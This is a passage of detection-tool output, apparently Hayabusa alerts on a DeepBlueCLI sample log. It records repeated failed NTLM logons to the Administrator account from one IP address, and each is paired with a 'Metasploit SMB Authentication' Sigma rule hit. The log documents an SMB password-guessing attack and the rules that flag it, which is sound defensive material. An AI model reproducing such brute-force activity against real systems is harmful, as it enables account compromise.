SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: 
